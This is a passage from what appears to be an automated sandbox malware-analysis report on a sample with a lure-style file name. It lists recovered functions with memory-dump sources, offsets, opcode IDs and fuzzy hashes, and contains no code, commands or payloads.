                                                                                                                                                                                                • Instruction ID: ff8a3f3ce7cc218a518b2dc733843a052dbead14b5903cd019f7b8931b70e049
                                                                                                                                                                                                • Opcode Fuzzy Hash: fb25a5fa42be49c5deb9144c70d4b76c8f7ae0eb185c1bbf9daa6c5cf7aa7b4c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BC10270D04219CBDB14EFA9E988BACBBB1FF45300F5094A9D089B7251DB305E99CF56
                                                                                                                                                                                                Function 06812B70 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 909d9567c209bda958826847f26a904dfbdae2668c4f55751862161d83a4dc4c
                                                                                                                                                                                                • Instruction ID: a1f6e58515c05d823f18101ded8f29552965c7c1d84b7d079145764c6a3c614f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 909d9567c209bda958826847f26a904dfbdae2668c4f55751862161d83a4dc4c
                                                                                                                                                                                                • Instruction Fuzzy Hash: E7817F74E002098FDBA4DF68C454BAEB7BAEF88314F148529D655DF290DB30DAC1CB51
                                                                                                                                                                                                Function 0819BEAB Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: dff1556bcf5d861d4d4ea854351ac5324c87bac79c6ac0476e4cfb4f46f3e849
                                                                                                                                                                                                • Instruction ID: 35ba6847a02f7ee2f5888d44305dace7999bb29ecf400f9fda013c7ee1d5b259
                                                                                                                                                                                                • Opcode Fuzzy Hash: dff1556bcf5d861d4d4ea854351ac5324c87bac79c6ac0476e4cfb4f46f3e849
                                                                                                                                                                                                • Instruction Fuzzy Hash: B981477580E3C48FDB069BB89864698BFB0EF43210F0A41DBC0D5EB1A3D6284C59CB62
                                                                                                                                                                                                Function 080BCCA8 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 3cd8559e752d7b944e5d00e5419199d110f46327873ef871cd67b82e59c5c767
                                                                                                                                                                                                • Instruction ID: c6b17e4bdcd5b43d546dd3156c1ca4b9ed034ada1151a8fda244dd9f28621d28
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cd8559e752d7b944e5d00e5419199d110f46327873ef871cd67b82e59c5c767
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F713834700245CFEB64DF28C894AAE7BE6AF8A702F1940A9E956CB371DB71DC41CB51
                                                                                                                                                                                                Function 06811C20 Relevance: .2, Instructions: 182COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 512967751090933de8bc92276108c72e7fbd2bf9ce8d71ebf2028138e4440c38
                                                                                                                                                                                                • Instruction ID: 6fc2f2ca798c703692b554192a6df3cd78fd3d7d14cff6c2fb87b34c4194aced
                                                                                                                                                                                                • Opcode Fuzzy Hash: 512967751090933de8bc92276108c72e7fbd2bf9ce8d71ebf2028138e4440c38
                                                                                                                                                                                                • Instruction Fuzzy Hash: F3710470600614CFDB54DB28C898A697BF5FF89315F1585A9E64ACB272DB30EC45CB60
                                                                                                                                                                                                Function 06812B1C Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 62bb4f09201579a70d05a970d79f739415b5bffe52c61f9e56a0b607e6c304f1
                                                                                                                                                                                                • Instruction ID: 6a355d23b8b4073c5be333d0baac87a3a436035f7e1ab1a5841835d6f69968e0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 62bb4f09201579a70d05a970d79f739415b5bffe52c61f9e56a0b607e6c304f1
                                                                                                                                                                                                • Instruction Fuzzy Hash: C45129707107048FD7A4DF28D888B6A77EAFF84715F508869E15ACF261CE71E886CB41
                                                                                                                                                                                                Function 0819E0F1 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1dcd9005c3a054204907b397ea9879c12882bd60e4c18586d8bbf9e4436e0bfc
                                                                                                                                                                                                • Instruction ID: 89c0e99a5f5fe2b9970059aacf8ce496ae9e500e0d21b9897c1f4cd5e8ab4390
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dcd9005c3a054204907b397ea9879c12882bd60e4c18586d8bbf9e4436e0bfc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 12417B30D09648CFCB05EFB8E9585ECBFB1FF46300F1590AAD088A7266DB35486ACB55
                                                                                                                                                                                                Function 0172744B Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: df425b6e98bc8069e87c98dcb4a1a0fddb84fd36db578fd743ef594d1f484143
                                                                                                                                                                                                • Instruction ID: 16b569fd7beefe4abed29de7b0b518cb1ddfc8cb17f2769179163977042eea2e
                                                                                                                                                                                                • Opcode Fuzzy Hash: df425b6e98bc8069e87c98dcb4a1a0fddb84fd36db578fd743ef594d1f484143
                                                                                                                                                                                                • Instruction Fuzzy Hash: B041AC71A00218DFDB29CF68C944BAAFBF1FF48310F10846AE5599B262E774E946CB50
                                                                                                                                                                                                Function 0681125B Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1fa8c15752d4e4040022be34e109bab2b0a4904999ecaa2216ce15a158613343
                                                                                                                                                                                                • Instruction ID: a316ac964d72017a6a6ce5f5c29aa3ee325efe0d6a406ac7f3fcaceb4e92becd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fa8c15752d4e4040022be34e109bab2b0a4904999ecaa2216ce15a158613343
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D319F31700A108FDBA4EF38D85862D7BE6BF89610B14466DE55ACB3A4DF34DE02CB95
                                                                                                                                                                                                Function 06813F68 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: fcb78fbacf553ed277149f398e4148030ae9631b8d1248aff65e8e5fd18d4abd
                                                                                                                                                                                                • Instruction ID: 2029211feefe13aaaaf7d45fa5eee48bac0ae01411c47b467ac27f91a1860a1d
                                                                                                                                                                                                • Opcode Fuzzy Hash: fcb78fbacf553ed277149f398e4148030ae9631b8d1248aff65e8e5fd18d4abd
                                                                                                                                                                                                • Instruction Fuzzy Hash: C6313B71B002159FCB54DF68C844A6DBBBAFF48720F114669E625CB2B1CB71DD41CB90
                                                                                                                                                                                                Function 01725B70 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: fe2279c652766ea11a9601d125cf4355c0ee1951f776dab2aedf4b81c47afea0
                                                                                                                                                                                                • Instruction ID: f008d66b3800a367e4456195e3ec658d0f9683e47753a262108c95ce91bd15cc
                                                                                                                                                                                                • Opcode Fuzzy Hash: fe2279c652766ea11a9601d125cf4355c0ee1951f776dab2aedf4b81c47afea0
                                                                                                                                                                                                • Instruction Fuzzy Hash: BC316F3170421A9FDB159F69D8446AFBBB2FB98710F00812DF9058B354DB79CCA2DB91
                                                                                                                                                                                                Function 06813F78 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 76045c660a909798664449e29aaf1922f7060044f0b23f07c7fa820f35520c0b
                                                                                                                                                                                                • Instruction ID: 470ffc28ed9d576f47a660795bfc455e8431bbaf19e6050518e2e30268b1b9ca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 76045c660a909798664449e29aaf1922f7060044f0b23f07c7fa820f35520c0b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D311B71B002159FCB54DF68C844A6DBBB6FF48720B114669E625DB3B1CB71DD41CB90
                                                                                                                                                                                                Function 0819DFC7 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2f43101033ad29470645b7f6fbcecd17fb07b8cc3802079a8bf1cde948950f32
                                                                                                                                                                                                • Instruction ID: 6cf509a85606e74a7b924d8ec366619c3fda9c03989daa67caab913d5cec8b5d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f43101033ad29470645b7f6fbcecd17fb07b8cc3802079a8bf1cde948950f32
                                                                                                                                                                                                • Instruction Fuzzy Hash: 78317A30D09248DFDB04EFB8E9495ACBFB0FF46310F1594AAE084B7262DB7459A9CB51
                                                                                                                                                                                                Function 06811C10 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b5719ad45dea3885d233e9b254b155cdd05789cb8357c7d2b93e7fa394a23685
                                                                                                                                                                                                • Instruction ID: 67d50be87afd0f1e61666a984ba97626f0c8664e9fcf6b57699b84cd5cb7e351
                                                                                                                                                                                                • Opcode Fuzzy Hash: b5719ad45dea3885d233e9b254b155cdd05789cb8357c7d2b93e7fa394a23685
                                                                                                                                                                                                • Instruction Fuzzy Hash: FC41E0706006148FCB54DF28C988E997BF5FF88315F2185A9E54ACB276DA30EC49CBA0
                                                                                                                                                                                                Function 01725B30 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: dc671994d80f0f1c81565c6ff06d3eed1f439522b8f4e17eaeab48801d3e9f50
                                                                                                                                                                                                • Instruction ID: e90a9d7a5b036b93d40f13cd980aa37c99e6c5708576088719474a62f4a93faf
                                                                                                                                                                                                • Opcode Fuzzy Hash: dc671994d80f0f1c81565c6ff06d3eed1f439522b8f4e17eaeab48801d3e9f50
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E31263160D3A69FE7069F28D8502DB7FB1EF55210F0441AEE4448B252D638CC96CB92
                                                                                                                                                                                                Function 01729AC8 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 3fb822a56b5174d881ff17acbc8ccf6cfd45b9df51a58653380f5351cf491fef
                                                                                                                                                                                                • Instruction ID: 32d2448479e8e18984cc8f46368efe6fb7314deb5f98fe54cb8d74ec495303aa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fb822a56b5174d881ff17acbc8ccf6cfd45b9df51a58653380f5351cf491fef
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F21F4313042304FEB265739C45837EBB97AFC5618F5C80B9D60ACB396EA65CC439781
                                                                                                                                                                                                Function 01726E79 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 400b996e59e5e85a00d370df436cd53a13c154ce368447d3dc6b0aace03a1bbb
                                                                                                                                                                                                • Instruction ID: f648aa637b9eb642de3db9b1db50fa312f11adc6125bc16ffe96e1b4b533a112
                                                                                                                                                                                                • Opcode Fuzzy Hash: 400b996e59e5e85a00d370df436cd53a13c154ce368447d3dc6b0aace03a1bbb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E21F735B056619FC7259B29D45492BFBE2BF8A65070840BFF906CB355CE30DC038791
                                                                                                                                                                                                Function 01728E87 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 19aa68b27e2675ea5b61f2ae87ce95507690f82446f0466bfee95cdc30e47405
                                                                                                                                                                                                • Instruction ID: 27e87f5aaa8967a0cdb96bd6fcc3e5dd4296871c8e0142010671dd69112fbe8f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 19aa68b27e2675ea5b61f2ae87ce95507690f82446f0466bfee95cdc30e47405
                                                                                                                                                                                                • Instruction Fuzzy Hash: 41317270A005158FCB04DF6CC8849AEFBF7BF88710F198559E6199B3A5CB359C02CB91
                                                                                                                                                                                                Function 06810678 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: ee193855943bbe6c6e5857394d8a6554b14de82bfc882549e2451cd3adb80b86
                                                                                                                                                                                                • Instruction ID: 9d3ae9c2db3184e75c4a8c25a488f662a294bcec2da84342e34fe6a233fa263f
                                                                                                                                                                                                • Opcode Fuzzy Hash: ee193855943bbe6c6e5857394d8a6554b14de82bfc882549e2451cd3adb80b86
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C214134B102194B9BD56B399C2423E66EB9BC5656708442ADB0BCF394EF35CCC2CB96
                                                                                                                                                                                                Function 0819DFE0 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f486d9e023414c8c3143e1547b722543b0ad61e755555fcc8d25bcc1b63e13ff
                                                                                                                                                                                                • Instruction ID: 8645f80c0712ecfd3350262fd480ad08cdce0ae34dbe6aaf8fbac6d1050e43da
                                                                                                                                                                                                • Opcode Fuzzy Hash: f486d9e023414c8c3143e1547b722543b0ad61e755555fcc8d25bcc1b63e13ff
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E312570E05108EFDB04EFA9E9885ACBFB1FF49300F5198A9E084B7211DB7059A8CB55
                                                                                                                                                                                                Function 06810335 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 6866b1b7db325d16f7e3a890037a38e0bf55ca028dc0d1e2d452e7b90fc5b89c
                                                                                                                                                                                                • Instruction ID: 429388e54a735ac7c45c86e013bc109ec587ac73976256eb9f2c3fa1de65665b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6866b1b7db325d16f7e3a890037a38e0bf55ca028dc0d1e2d452e7b90fc5b89c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B31E734A002088FDB94DF68C844AAEBBF6AF89311F144468D906EB2A1DB31DD82CF51
                                                                                                                                                                                                Function 01720838 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 94565ebee425d9bc0ef2b476439dfa599b7816cd75955fe9d65d5ad4889119d3
                                                                                                                                                                                                • Instruction ID: 1af1bab857140722cce16805444e036e2e871904b271455e6311890834785b2e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 94565ebee425d9bc0ef2b476439dfa599b7816cd75955fe9d65d5ad4889119d3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 96312C7090421D8FDF45DFE9C8A15EEBBB2FF88300F10856AD112AB265DA355E49CB91
                                                                                                                                                                                                Function 06814D08 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: a4a523acdea2d13da9e97c7bf933294f9bebcfffa4e607c38541e7a343be7707
                                                                                                                                                                                                • Instruction ID: 9d593d0282d6f7b909573b8cad75406d22bfcb016e80bee2d9b3a86d566709a9
                                                                                                                                                                                                • Opcode Fuzzy Hash: a4a523acdea2d13da9e97c7bf933294f9bebcfffa4e607c38541e7a343be7707
                                                                                                                                                                                                • Instruction Fuzzy Hash: B521A130200709CFCB65DE39D8608BE77F9FF823057104A6DE5668E290DB36D996CB91
                                                                                                                                                                                                Function 0144D114 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2462522215.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_144d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d672e0d8348a7a0d4f2de67ff16e332cb19ec19ae4aa0be38de1c9761bf71b28
                                                                                                                                                                                                • Instruction ID: 33473052e8b8e460300c39521c1e43dea832347dd4bcae165d7da228ba0cb3d0
                                                                                                                                                                                                • Opcode Fuzzy Hash: d672e0d8348a7a0d4f2de67ff16e332cb19ec19ae4aa0be38de1c9761bf71b28
                                                                                                                                                                                                • Instruction Fuzzy Hash: A821F1B1A04240DFEB05DF58D8C4B27BF66FBA4324F24C56AED0A0A366C336D416C6A1
                                                                                                                                                                                                Function 0145D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2462566823.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_145d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5c5af336c4e111aec971674cf34b9a0a79d20def7e02a7bb6c89a9357ddb07f3
                                                                                                                                                                                                • Instruction ID: b191ea8fbd12ed56f925f7c4124f2580bf71ff18b066f61870d078cd7d28d559
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c5af336c4e111aec971674cf34b9a0a79d20def7e02a7bb6c89a9357ddb07f3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C21D6719042009FDB45DF54D9C4B16BBA5FF84324F24C56EED094B363C736D446CA61
                                                                                                                                                                                                Function 0145D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2462566823.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_145d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f21a519627470e3e30b28f04bc77abd1cf64f4b6f147297c151c4bf4c89abf1f
